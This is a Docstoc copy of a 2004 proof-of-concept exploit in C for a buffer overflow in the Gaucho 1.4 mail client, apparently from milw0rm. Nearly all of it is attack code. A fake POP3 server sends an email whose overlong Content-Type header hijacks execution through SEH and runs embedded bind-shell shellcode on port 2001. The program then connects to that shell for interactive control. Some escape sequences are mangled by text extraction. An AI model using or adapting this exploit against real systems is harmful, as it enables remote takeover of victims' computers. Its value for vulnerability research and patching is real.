Docstoc

Gaucho 1.4 Mail Client Buffer Overflow Vulnerability

Document Sample
Gaucho 1.4 Mail Client Buffer Overflow Vulnerability Powered By Docstoc
					                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability           Page 1/9
  1    //**************************************************************************
  2    // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability
  3    // Bind Shell POC Validation Code for English Win2K SP4
  4    // 10 Aug 2004
  5    //
  6    // Gaucho is an Email client developed by NakedSoft for Microsoft Windows
  7    // platforms.   Gaucho supports SMTP, POP3 and other email delivery protocols.
  8    // Gaucho version 1.4 is vulnerable to a buffer overflow when receiving
  9    // malformed emails from a POP3 server.   This vulnerability is triggered if the
  10   // POP3 server returns a specially crafted email that has an abnormally long
  11   // string in the Content−Type field of the email header. This string will
  12   // overwrite EIP via SEH, and can be exploited to execute arbitrary code.
  13   //
  14   // This POC code simulates a POP3 server that sends a specially crafted email
  15   // to Gaucho, triggering the overflow and binds shell on port 2001 of a vulnerable
  16   // Gaucho email client.
  17   //
  18   // Tested on Win2K SP4, you must find the address of JMP EDI instruction that
  19   // is suitable for your system.
  20   //
  21   // Advisory
  22   // http://www.security.org.sg/vuln/gaucho140.html
  23   //
  24   // Greetz: snooq, sk, and all guys at SIG^2 (www.security.org.sg)
  25   //
  26   //**************************************************************************
  27
  28   #include <winsock2.h>
  29   #include <windows.h>
  30   #include <stdio.h>
  31   #include <stdlib.h>
  32   #include <conio.h>
  33   #pragma comment(lib,"ws2_32.lib")
  34
  35   bool tcpInit()
  36   {
  37   WORD wVersionRequested;
  38   WSADATA wsaData;
  39   int err;
  40
  41   wVersionRequested = MAKEWORD( 2, 0 );
  42
  43   err = WSAStartup( wVersionRequested, &wsaData );
  44   if ( err != 0 ) {
  45   return false;
  46   }
  47
  48   if (LOBYTE( wsaData.wVersion ) != 2 ||
  49           HIBYTE( wsaData.wVersion ) != 0 )
  50   {
  51   WSACleanup();
  52   return false;
Tan Chew Keong                                                                              08/27/2004
                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability   Page 2/9
  53    }
  54
  55    return true;
  56    }
  57
  58
  59    SOCKET tcpListen(int port)
  60    {
  61        SOCKET sock;
  62
  63    sock = socket(AF_INET, SOCK_STREAM, 0);
  64
  65    if(sock == INVALID_SOCKET)
  66    return sock;
  67
  68    sockaddr_in sin;
  69
  70    sin.sin_addr.s_addr = htonl(INADDR_ANY);
  71    sin.sin_family = AF_INET;
  72    sin.sin_port = htons(port);
  73
  74    if(bind(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
  75    {
  76    printf("Error in bind().n");
  77    closesocket(sock);
  78    return INVALID_SOCKET;
  79    }
  80
  81    if(listen(sock, 5) == SOCKET_ERROR)
  82    {
  83    printf("Error in bind().n");
  84    closesocket(sock);
  85    return INVALID_SOCKET;
  86    }
  87
  88    return sock;
  89    }
  90
  91
  92    DWORD resolveIP(char *hostName)
  93    {
  94    hostent *hent;
  95    char **addresslist;
  96    DWORD result = 0;
  97
  98    hent = gethostbyname(hostName);
  99    if(hent)
  100   {
  101   addresslist = hent−>h_addr_list;
  102
  103   if (*addresslist)
  104   {
Tan Chew Keong                                                                      08/27/2004
                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability   Page 3/9
  105   result = *((DWORD *)(*addresslist));
  106   }
  107   }
  108
  109   return result;
  110   }
  111
  112
  113   SOCKET tcpConnect(char *host, int port)
  114   {
  115       SOCKET sock;
  116
  117   sock = socket(AF_INET, SOCK_STREAM, 0);
  118
  119   if(sock == INVALID_SOCKET)
  120   return sock;
  121
  122   sockaddr_in sin;
  123
  124   DWORD ip = resolveIP(host);
  125   if(ip == 0)
  126   ip = inet_addr(host);
  127
  128   sin.sin_addr.s_addr = ip;
  129   sin.sin_family = AF_INET;
  130   sin.sin_port = htons(port);
  131
  132       if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
  133   {
  134   printf("Connect failed.n");
  135   closesocket(sock);
  136   return INVALID_SOCKET;
  137   }
  138
  139   return sock;
  140   }
  141
  142
  143   void shell(int sockfd)
  144   {
  145   char buffer[1024];
  146   fd_set rset;
  147   FD_ZERO(&rset);
  148
  149   for(;;)
  150   {
  151   if(kbhit() != 0)
  152   {
  153   fgets(buffer, sizeof(buffer) − 2, stdin);
  154   send(sockfd, buffer, strlen(buffer), 0);
  155   }
  156

Tan Chew Keong                                                                      08/27/2004
                                  Gaucho 1.4 Mail Client Buffer Overflow Vulnerability                   Page 4/9
  157   FD_ZERO(&rset);
  158   FD_SET(sockfd, &rset);
  159
  160   timeval tv;
  161   tv.tv_sec = 0;
  162   tv.tv_usec = 50;
  163
  164   if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
  165   {
  166   printf("select errorn");
  167   break;
  168   }
  169
  170   if(FD_ISSET(sockfd, &rset))
  171   {
  172   int n;
  173
  174   ZeroMemory(buffer, sizeof(buffer));
  175   if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
  176   {
  177   printf("EOFn");
  178   exit(0);
  179   }
  180   else
  181   {
  182   fwrite(buffer, 1, n, stdout);
  183   }
  184   }
  185   }
  186   }
  187
  188
  189   #define OK_MSG"+OK POC POP3 server for Gaucho Ver 1.4 Vulnerability ready.rn"
  190   #define STAT_REPLY"+OK 1 1rn"
  191
  192
  193   char UIDL_REPLY[] =
  194   "1 0123456789012345678901234567890123456789rn.rn";
  195
  196
  197   unsigned char bindShellEmail[] =
  198   "Date: Mon, 09 Aug 2004 19:44:13 +0800rn"
  199   "Subject: Testingrn"
  200   "To: a@aaaaaa.xxxrn"
  201   "From: XX <xx@xxxxxxxx.xxx.xx>rn"
  202   "Message−ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>rn"
  203   "MIME−Version: 1.0rn"
  204   "Content−Type: "
  205   "AAAABBBBCCCCDDDDEEEEFFFFGGGG1HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  206   "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
  207   "x37x55x62x76"// overwrites EIP via SEH, address of JMP EDI in MPR.dll
Tan Chew Keong                                                                                           08/27/2004
                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability                        Page 5/9
  208   // this address must be carefully chosen due to the filtering that is done
  209   // on the header messages.
  210
  211   "IIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
  212   "AAAABBBBCCCCDDDDEEEEFFFFGGGG3HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  213   "AAAABBBBCCCCDDDDEEEEFFFFGGGG4HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  214   "AAAABBBBCCCCDDDDEEEEFFFFGGGG5HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  215   "AAAABBBBCCCCDDDDEEEEFFFFGGGG6HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  216   "AAAABBBBCCCCDDDDEEEEFFFFGGGG7HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  217   "AAAABBBBCCCCDDDDEEEEFFFFGGGG8HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  218   "AAAABBBBCCCCDDDDEEEEFFFFGGGG9HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  219   "AAAABBBBCCCCDDDDEEEEFFFFGGGGAHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  220   "AAAABBBBCCCCDDDDEEEEFFFFGGGGBHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  221   "AAAABBBBCCCCDDDDEEEEFFFFGGGGCHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  222   "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
  223   "xEBx60"// FIRST jmp lands us here, do a SECOND jmp to land onto shellcode
  224   "HHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
  225   ";"
  226   "x90x90xEBx61"// JMP EDI lands here, do the FIRST jmp here to reach the SECOND jmp
  227   "set=US−ASCIIrn"
  228   "rn"
  229   "x90x90"// shellcode sent in email body to avoid filtering (bindshell on 2001)
  230   "xEBx62x55x8BxECx51x56x57x8Bx5Dx08x8Bx73x3Cx8Bx74"
  231   "x33x78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex18x56x33xD2x8B"
  232   "x37x03x75x08x33xDBx33xC0xACx85xC0x74x09xC1xCBx0C"
  233   "xD1xCBx03xD8xEBxF0x3Bx5Dx0Cx74x0Bx83xC7x04x42xE2"
  234   "xDEx5Ex33xC0xEBx17x5Ex8Bx7Ex24x03x7Dx08x66x8Bx04"
  235   "x57x8Bx7Ex1Cx03x7Dx08x8Bx04x87x03x45x08x5Fx5Ex59"
  236   "x8BxE5x5DxC3x55x8BxECx33xC9xB1xC8x2BxE1x32xC0x8B"
  237   "xFCxF3xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8B"
  238   "x58x08x89x5DxFCx68x8Ex4Ex0ExECxFFx75xFCxE8x70xFF"
  239   "xFFxFFx83xC4x08xBBxAAxAAx6Cx6CxC1xEBx10x53x68x33"
  240   "x32x2Ex64x68x77x73x32x5Fx54xFFxD0x89x45xF8xEBx35"
  241   "x5Ex8Dx7DxF4x33xC9xB1x09xFFx36xFFx75xFCxE8x40xFF"
  242   "xFFxFFx83xC4x08x85xC0x75x0Ex90xFFx36xFFx75xF8xE8"
  243   "x2ExFFxFFxFFx83xC4x08x89x07x33xC0xB0x04x03xF0x2B"
  244   "xF8xE2xD5xEBx29xE8xC6xFFxFFxFFx72xFExB3x16x35x54"
  245   "x8AxA1xA4xADx2ExE9xA4x1Ax70xC7xD9x09xF5xADxCBxED"
  246   "xFCx3BxEFxCExE0x60xE7x79xC6x79xADxD9x05xCEx54x6A"
  247   "x02xFFx55xE0x33xC0x50x50x50x50x6Ax01x6Ax02xFFx55"
  248   "xE4x89x45xD0x33xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50"
  249   "x8BxC4x6Ax10x50xFFx75xD0xFFx55xE8x6Ax05xFFx75xD0"
Tan Chew Keong                                                                                           08/27/2004
                               Gaucho 1.4 Mail Client Buffer Overflow Vulnerability                      Page 6/9
  250   "xFFx55xECx85xC0x75x68x8BxCCx6Ax10x8BxDCx33xC0x50"
  251   "x50x53x51xFFx75xD0xFFx55xF0x8BxD0x5Bx83xF0xFFx74"
  252   "x4Ex8BxFCx33xC9xB1x64x33xC0xF3xAAxC6x04x24x44x66"
  253   "xC7x44x24x2Cx01x01x89x54x24x38x89x54x24x3Cx89x54"
  254   "x24x40x8BxC4x8Dx58x44xB9xFFx63x6Dx64xC1xE9x08x51"
  255   "x8BxCCx52x53x53x50x33xC0x50x50x50x6Ax01x50x50x51"
  256   "x50xFFx55xF4x5Bx6AxFFxFFx33xFFx55xD4xFFx55xD8xFF"
  257   "x75xD0xFFx55xD8x50xFFx55xDC"
  258   "rn"
  259   ".rn";
  260
  261   unsigned char pocEmail[] =
  262   "Date: Mon, 09 Aug 2004 19:44:13 +0800rn"
  263   "Subject: Testingrn"
  264   "To: a@aaaaaa.xxxrn"
  265   "From: XX <xx@xxxxxxxx.xxx.xx>rn"
  266   "Message−ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>rn"
  267   "MIME−Version: 1.0rn"
  268   "Content−Type: "
  269   "AAAABBBBCCCCDDDDEEEEFFFFGGGG1HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  270   "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
  271   "HHHH"// overwrites EIP via SEH
  272   "IIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
  273   "AAAABBBBCCCCDDDDEEEEFFFFGGGG3HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  274   "AAAABBBBCCCCDDDDEEEEFFFFGGGG4HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  275   "AAAABBBBCCCCDDDDEEEEFFFFGGGG5HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  276   "AAAABBBBCCCCDDDDEEEEFFFFGGGG6HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  277   "AAAABBBBCCCCDDDDEEEEFFFFGGGG7HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  278   "AAAABBBBCCCCDDDDEEEEFFFFGGGG8HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  279   "AAAABBBBCCCCDDDDEEEEFFFFGGGG9HHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  280   "AAAABBBBCCCCDDDDEEEEFFFFGGGGAHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  281   "AAAABBBBCCCCDDDDEEEEFFFFGGGGBHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  282   "AAAABBBBCCCCDDDDEEEEFFFFGGGGCHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  283   "AAAABBBBCCCCDDDDEEEEFFFFGGGGDHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
        "
  284   "; charset=US−ASCIIrn"
  285   "Content−Transfer−Encoding: 7bitrn"
  286   "X−Mailer: Gaucho Version 1.4.0 Build 145rn"
  287   "rn"
  288   "Testingrn"
  289   "rn"
Tan Chew Keong                                                                                           08/27/2004
                                    Gaucho 1.4 Mail Client Buffer Overflow Vulnerability   Page 7/9
  290   ".rn";
  291
  292
  293   void genUIDLreply(char *ptr)
  294   {
  295   srand(GetTickCount());
  296   for(int i = 2; i < 42; i++)
  297   {
  298   ptr = (rand() % 94) + 0x21;
  299   }
  300   }
  301
  302   void printUsage(char *filename)
  303   {
  304   printf("nUsage: %s <mode>nn", filename);
  305   printf(" Mode can be:n");
  306   printf(" 1 − POC Crashn"
  307     " 2 − Bindshell on Port 2001 (JMP EDI address is hardcoded for Win2K SP4)nn");
  308   }
  309
  310   int main(int argc, char* argv[])
  311   {
  312   printf("Proof−of−Concept POP3 server for Gaucho Ver 1.4 Vulnerabilityn");
  313   if(argc != 2)
  314   {
  315   printUsage(argv[0]);
  316   return 1;
  317   }
  318
  319   int mode = atoi(argv[1]);
  320   if(mode != 1 && mode != 2)
  321   {
  322   printf("nINVALID MODE!n");
  323   printUsage(argv[0]);
  324   return 1;
  325   }
  326
  327   if(!tcpInit())
  328   {
  329   printf("Cannot start Winsock!n");
  330   return 1;
  331   }
  332   SOCKET s = tcpListen(110);
  333   if(s == INVALID_SOCKET)
  334   {
  335   printf("Cannot create listening socket!n");
  336   return 1;
  337   }
  338   printf("Listening on POP3 port 110...n");
  339
  340   struct sockaddr_in sin;
  341   int sin_size = sizeof(sin);
Tan Chew Keong                                                                             08/27/2004
                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability   Page 8/9
  342   SOCKET client = WSAAccept(s, (SOCKADDR *)&sin, &sin_size, NULL, 0);
  343   char buffer[1024];
  344   int recvSize;
  345
  346   if(client != INVALID_SOCKET)
  347   {
  348   // POP3 banner
  349   send(client, OK_MSG, strlen(OK_MSG), 0);
  350   recvSize = recv(client, buffer, sizeof(buffer), 0);
  351   if(recvSize <= 0)
  352   return 1;
  353
  354   fwrite(buffer, recvSize, 1, stdout);
  355
  356   // OK to USER
  357   send(client, OK_MSG, strlen(OK_MSG), 0);
  358   recvSize = recv(client, buffer, sizeof(buffer), 0);
  359   if(recvSize <= 0)
  360   return 1;
  361
  362   fwrite(buffer, recvSize, 1, stdout);
  363
  364   // OK to PASS
  365   send(client, OK_MSG, strlen(OK_MSG), 0);
  366   recvSize = recv(client, buffer, sizeof(buffer), 0);
  367   if(recvSize <= 0)
  368   return 1;
  369
  370   fwrite(buffer, recvSize, 1, stdout);
  371
  372   // REPLY to STAT
  373   send(client, STAT_REPLY, strlen(STAT_REPLY), 0);
  374   recvSize = recv(client, buffer, sizeof(buffer), 0);
  375   if(recvSize <= 0)
  376   return 1;
  377
  378   fwrite(buffer, recvSize, 1, stdout);
  379
  380   // REPLY to UIDL
  381   genUIDLreply(UIDL_REPLY);
  382   send(client, STAT_REPLY, strlen(STAT_REPLY), 0);
  383   send(client, UIDL_REPLY, strlen(UIDL_REPLY), 0);
  384   recvSize = recv(client, buffer, sizeof(buffer), 0);
  385   if(recvSize <= 0)
  386   return 1;
  387
  388   fwrite(buffer, recvSize, 1, stdout);
  389
  390   // REPLY to LIST
  391   send(client, STAT_REPLY, strlen(STAT_REPLY), 0);
  392   recvSize = recv(client, buffer, sizeof(buffer), 0);
  393   if(recvSize <= 0)
Tan Chew Keong                                                                      08/27/2004
                             Gaucho 1.4 Mail Client Buffer Overflow Vulnerability                  Page 9/9
  394   return 1;
  395
  396   fwrite(buffer, recvSize, 1, stdout);
  397
  398   if(mode == 1)
  399   {
  400   // send malicious email
  401   send(client, (char *)pocEmail, strlen((char *)pocEmail), 0);
  402   printf("POC crash email sent...n");
  403
  404   recvSize = recv(client, buffer, sizeof(buffer), 0);
  405   if(recvSize <= 0)
  406   return 1;
  407
  408   fwrite(buffer, recvSize, 1, stdout);
  409   }
  410   else
  411   {
  412   // send malicious email
  413   send(client, (char *)bindShellEmail, strlen((char *)bindShellEmail), 0);
  414   printf("Bindshell email sent. Sleeping for 2 seconds...n");
  415   Sleep(2000);
  416
  417   //================================= Connect to the target ==============================
  418   SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
  419   if(sock == INVALID_SOCKET)
  420   {
  421   printf("Invalid socket return in socket() call.n");
  422   WSACleanup();
  423   return −1;
  424   }
  425
  426   sin.sin_family = AF_INET;
  427   sin.sin_port = htons(2001);
  428
  429   if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
  430   {
  431   printf("Exploit Failed. SOCKET_ERROR return in connect call.n");
  432   closesocket(sock);
  433   WSACleanup();
  434   return −1;
  435   }
  436
  437   printf("n");
  438   shell(sock);
  439   }
  440   }
  441
  442   return 0;
  443   }
  444
  445   // milw0rm.com [2004−08−27]
Tan Chew Keong                                                                                     08/27/2004

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:21
posted:5/24/2010
language:English
pages:9